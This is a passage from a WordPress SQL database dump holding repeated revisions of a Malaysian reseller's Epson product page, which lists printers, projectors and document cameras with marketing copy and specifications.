Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 09:28:39','2019-09-26 01:28:39','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3482,1,'2019-09-26 09:40:25','2019-09-26 01:40:25','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 35ppm</li>\n 	<li>Auto-Duplex</li>\n 	<li>Ethernet &amp; Epson iPrint</li>\n 	<li>2 optional paper cassette tray</li>\n</ul>[maxbutton id=\"12\" ]<h4><strong>Epson WorkForce AL-M8100DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M8100DN-.png\" alt=\"\" width=\"256\" height=\"144\" /><br><br>\nUnleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Print speed up to 40 ppm</li>\n 	<li>Epson iPrint</li>\n 	<li>Ethernet</li>\n 	<li>4 optional cassette trays</li>\n</ul>[maxbutton id=\"12\" ]		\n			<h2>POS PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson TM-H6000IVÂ </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-H6000IV.png\" alt=\"\" width=\"224\" height=\"125\" /></p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.</p><ul><li>Thermal &amp; Dot Output</li><li>Speed: Up to 300mm/sec</li><li>Check printing</li><li>Bi-directional printing</li><li>SupportsÂ slip printing, validation and endorsement print</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T88V-iÂ </strong>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T88V-i.png\" alt=\"\" width=\"243\" height=\"137\" /></h4>\nCreate a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.\n<ul>\n 	<li>Printing speed of up to 300mm/second</li>\n 	<li>20 million lines for printer mechanism</li>\n 	<li>Up to 2 million for auto-cutter</li>\n 	<li>LAN, Serial, USB 2.0 (Type A) x 4</li>\n 	<li>Control peripherals easily</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson TM-T70IIÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-TM-T70II.png\" alt=\"\" width=\"254\" height=\"143\" /><br /><br /></h4><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.</p><ul><li>Print method: Thermal line printing</li><li>Width: 79Â Â±Â 0.5 mm</li><li>Print Speed: Up to 250 mm/ sec</li><li>Auto-cutter feature</li></ul><center>[maxbutton id=\"12\" ]</center>		\n			<h2>PHOTO PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson L1800 A3 Photo Ink Tank Printer</strong></h4><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L1800-Printer.png\" alt=\"\" width=\"241\" height=\"175\" /><br>\nIn creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.\n<ul>\n 	<li>Yield of up to 1,500 4R photos</li>\n 	<li>Print speed up to 15ppm</li>\n 	<li>High-yield ink bottles</li>\n 	<li>1-year warranty or 9,000 prints</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L850 PrinterÂ </strong><br><br><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L850-Printer.png\" alt=\"\" width=\"261\" height=\"147\" /></h4><br>\nImaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.\n<ul>\n 	<li>High-yield ink bottles</li>\n 	<li>2.7 colour LCD screen</li>\n 	<li>Direct printing via memory card slot, USB port and PictBridge</li>\n 	<li>CD/DVD printing</li>\n 	<li>Warranty of 1 year or 3,000 photo prints, whichever comes first</li>\n</ul>\n[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson L805 PrinterÂ </strong><br><br><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L805-Printer-.png\" alt=\"\" width=\"240\" height=\"135\" /></h4><br>\nThe L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.\n<ul>\n 	<li>Yield of Up to 1,800 4R photos</li>\n 	<li>Lowest Printing Costs</li>\n 	<li>Wi-Fi &amp; Epson iPrint</li>\n 	<li>CD/DVD Printing Capability</li>\n 	<li>1 year or 3,000 prints warranty</li>\n</ul>\n[maxbutton id=\"12\" ]		\n			<h3>Projectors for Work</h3>		\n			<h3>CORPORATE AND EDUCATIONÂ </h3>		\n		<p><strong>Epson EB-2055</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2055.png\" alt=\"\" width=\"245\" height=\"163\" /></p><p>Leave the lights on and take control whether in the meeting room or classroom. Epsonâ€™s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.</p><ul><li>XGA Resolution</li><li>White and Colour Light Output at 5,000 lumens</li><li>Gesture Presenter</li><li>Multi-PC Projection</li><li>2 x HDMI</li><li>Split Screen</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-2142W</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-2142W.jpg\" alt=\"\" width=\"245\" height=\"138\" /></p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.</p><ul><li>White and Colour Brightness at 4,200lm</li><li>WXGA Resolution</li><li>12000 hours lamp life in eco-mode</li><li>MHL-enabled</li><li>Multi-PC Projection</li><li>Horizontal Keystone Slider</li><li>Miracast<sup>Â®</sup></li></ul>[maxbutton id=\"12\" ]<br /><p><strong>Epson EB-L500WÂ </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-L500W.jpg\" alt=\"\" width=\"251\" height=\"142\" /></p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.</p><ul><li>5,000 lumens colour/white brightness<sup>Â </sup></li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio</li><li>Laser light source of up to 20,000 hours</li><li>Virtually maintenance-free for optical engine life</li></ul>[maxbutton id=\"12\" ]		\n			<h3>ACCENT LIGHTING LASER PROJECTORS</h3>		\n		<p><strong>Epson LightScene EV-105</strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-LightScene-EV-105.jpg\" alt=\"\" width=\"263\" height=\"176\" /></p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and dÃ©cor applications. Designed to blend in discreetly to any setting â€” from retail, hospitality and event spaces to showrooms and museums â€” LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.</p><ul><li>Laser projector for digital art and signage</li><li>Seamlessly blends into virtually any environment</li><li>Up to 20,000 hours of virtually maintenance-free operation</li><li>360-degree mounting: floors, walls or ceilings</li><li>Remote management and control tools</li><li>Best New Award Overall</li></ul>[maxbutton id=\"12\" ]<h3>ULTRA PORTABLE</h3><p><strong>Epson EB-1785WÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-1785W.png\" alt=\"\" width=\"236\" height=\"133\" /></p><p>The Epson EB-1785W packs superior imaging quality along with a suite of connectivity and usability features into a body weighing only 1.83kg and 44mm slim. Wirelessly connect your smart devices to the projector via Wi-Fi, Miracast, iProjection application or NFC technology. The EB-1785W comes with Gesture Presenter technology, which allows you to transit between slides without a clicker. Lastly, with Epson\'s 3LCD technology that delivers up to 3 times wider colour gamut and brightness, you can astound audiences anywhere you go.</p><ul><li>White Light Output 3,200 lumens, Colour Light Output 3,200 lumens</li><li>WXGA Resolution</li><li>Real-Time Auto Keystone Correction</li><li>Split Screen Projection</li><li>Hassle-Free Presentation with USB 3-in-1 Display Feature and Epson iProjection</li></ul>[maxbutton id=\"12\" ]		\n			<h3>INTERACTIVE</h3>		\n		<p><strong>Epson EB-536WiÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-536Wi.png\" alt=\"\" width=\"242\" height=\"136\" /></p><p>Project large screen sizes even at close range and make your presentations larger-than-life with Epson EB-536Wi projector.</p><ul><li>White and Colour Brightness at 3,400lm</li><li>WXGA Resolution</li><li>Multi-PC projection</li><li>HDMI Connectivity</li><li>Pen Interactivity</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson 595Wi/585Wi/575Wi</strong>Â <img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-595Wi.png\" alt=\"\" width=\"276\" height=\"155\" /></p><p>With the finger-touch interactive function and PC-free annotation, you can easily transform any surface into an interactive environment so everyone can throw their ideas on the table.</p><ul><li>WXGA Resolution</li><li>White and Colour Brightness at 3,300lm</li><li>Multi-PC projection</li><li>HDMI Connectivity x2</li></ul>[maxbutton id=\"12\" ]		\n			<h3>HIGH BRIGHTNESS</h3>		\n		<p><strong>Epson EB-L1405UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/EB-L1405UNL.png\" alt=\"\" width=\"207\" height=\"117\" /></p><p>The Epson EB-L1405U projector is designed to deliver unyielding laser performance, from any position to most surfaces, up to 20,000Â long lasting hours maintenance-free.</p><ul><li>White and Colour Brightness at 8,000lm</li><li>WUXGA (1920 x 1200)</li><li>Edge-blending to create large panoramic images</li><li>Curve and corner wall projection</li><li>HDBaseT</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-G7400UNLÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-G7400UNL.png\" alt=\"\" width=\"205\" height=\"116\" /></p><p>Epson high brightness EB-G7400U projector presents a new perspective on clarity, durability, and versatility. With the advanced C2Fineâ„¢ and 4K Enhancement Technology, projections are brought to life with vibrant colours in extreme resolution and vividness. Overcome the limitations of space constraints and project large and uncompromised images through the projectorâ€™s astoundingly short throw ratio of 0.35*.</p><p><em>* With optional ELPLX01 zero offset ultra-short throw lens.</em></p><ul><li>High Brightness</li><li>Beyond Full HD Resolution</li><li>Powered Lens</li><li>Portrait Projection</li><li>Flexible Installation</li><li>Edge Blending</li><li>Point Correction</li></ul>[maxbutton id=\"12\" ]<p><strong>Epson EB-Z10000UÂ </strong></p><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EB-Z10000U.png\" alt=\"\" width=\"208\" height=\"117\" /></p><p>Discover a powerful way to impress your audience the EB-Z10000U high brightness business projector gives you stunning, high-definition images with its 3LCD technology.</p><ul><li>White and Colour Brightness at 10,000Â lm</li><li>WUXGA resolution</li><li>High Reliability and Durability</li><li>Suitable for 24/7 usage</li><li>Flexible projection angles and installations</li></ul>[maxbutton id=\"12\" ]<h3>DOCUMENT CAMERAS</h3><p><strong>Document Camera ELPDC21Â </strong><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Document-Camera-ELPDC21.jpg\" alt=\"\" width=\"206\" height=\"137\" /></p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.</p><ul><li>Pixels: 2MP (1920 x 1080 pixels)</li><li>Camera Sensor: 1/2.7 inch CMOS Sensor</li><li>Resolution: Up to Full HD (1080p)</li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom</li><li>Weight: Approx 3.0kg</li></ul><p>[maxbutton id=\"12\" ]</p>','Epson','','inherit','closed','closed','','1486-revision-v1','','','2019-09-26 09:40:25','2019-09-26 01:40:25','',1486,'https://bintara.com.my/blog/2019/09/26/1486-revision-v1/',0,'revision','',0),(3484,1,'2019-09-26 09:44:59','2019-09-26 01:44:59','<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.</p><h2>Printers for Work</h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.</p>		\n			<h2>BUSINESS INKJET PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson WorkForce Enterprise WF-C17590Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Enterprise-WF-C17590.jpg\" alt=\"\" width=\"366\" height=\"207\" /></p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCoreâ„¢, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.</p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax</li><li>Ink: DURABrite<sup>TM</sup>Â Pro pigment ink cartridges</li><li>ISO Print Speed: 75 ISO ppm (black/colour) simplex/duplex</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce Pro WF-C5290Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-Pro-WF-C5290.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.</p><ul><li>High yield ink packs</li><li>High-speed auto-duplex printing</li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li><li>Epson Connect</li><li>EnergyÂ saving</li></ul><h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-100Â </strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-100.png\" alt=\"\" width=\"378\" height=\"213\" /></p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.</p><ul><li>Print speed up to 14 ppm</li><li>Epson Connect</li><li>1.44 Colour LCD Panel</li><li>Wi-Fi and Wi-Fi Direct connectivity</li><li>Built-in battery</li></ul>		\n		<h4 style=\"text-align: center;\">[maxbutton id=\"12\" ]</h4><h4 style=\"text-align: center;\"><strong>Epson WorkForce WF-7711</strong></h4>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-WF-7711.png\" alt=\"\" width=\"304\" height=\"172\" /><br>\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM</sup>Â technology, fast printing speed consistently delivers success in every detail.\n<ul>\n 	<li>Print speeds up to 18ipm for black and 10ipm for colour</li>\n 	<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC</li>\n 	<li>Duplex printing up to A3 size</li>\n 	<li>Epson DURABrite<sup>TM</sup>Â Ultra ink</li>\n 	<li>4.3â€ Colour LCD Touch Panel</li>\n 	<li>Print, Scan, Copy Fax with ADF</li>\n</ul>\n<center>[maxbutton id=\"12\" ]</center>		\n			<h2>INK TANK SYSTEM</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson EcoTank L3150</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-EcoTank-L3150-.jpg\" alt=\"\" width=\"311\" height=\"175\" /></p><p>Save more with Epsonâ€™s economical and multifunctional printing solutions for businessâ€”the EcoTank L3150â€”built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.</p><ul><li>Compact integrated tank design</li><li>High yield ink bottles</li><li>Spill-free, error-free refilling</li><li>Wi-Fi, Wi-Fi Direct</li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)</li><li>Borderless printing up to 4R</li></ul><center>[maxbutton id=\"12\" ]</center><h4 style=\"text-align: center;\"><strong>Epson L120 PrinterÂ </strong><br /><br /><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-L120-Printer.png\" alt=\"\" width=\"301\" height=\"170\" /></h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.</p><ul><li>High-yield ink bottles</li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color</li><li>Compact Size</li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first</li></ul>		\n		[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\"><strong>Epson M1100 Printer</strong></h4><p><img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-M1100-Printer-.png\" alt=\"\" width=\"315\" height=\"178\" /></p><p>EfficiencyÂ meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pagesÂ each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.</p><ul><li>Compact integrated tank design</li><li>High-yield pigment ink bottle</li><li>Spill-free, error-free refilling</li><li>Print speed up to 32ppm (15ipm)</li><li>4 years warranty</li></ul>		\n		<center>[maxbutton id=\"12\" ]</center>		\n			<h2>LASER PRINTER</h2>		\n		<h4 style=\"text-align: center;\"><strong>Epson AcuLaser C9300N</strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-AcuLaser-C9300N.png\" alt=\"\" width=\"313\" height=\"177\" /><br>\nThe Epson AcuLaserâ„¢ C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.\n<ul>\n 	<li>1200 x 1200 dpi</li>\n 	<li>Speed: Up to 30ppm</li>\n 	<li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)</li>\n 	<li>Quality prints with new Epson Technologies</li>\n 	<li>New print job management features</li>\n</ul>[maxbutton id=\"12\" ]<h4 style=\"text-align: center;\">Â <strong>Epson WorkForce AL-M320DNÂ </strong></h4><br><br>\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/Epson-WorkForce-AL-M320DN-.jpg\" alt=\"\" width=\"254\" height=\"296\" /><br>\nThe Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast 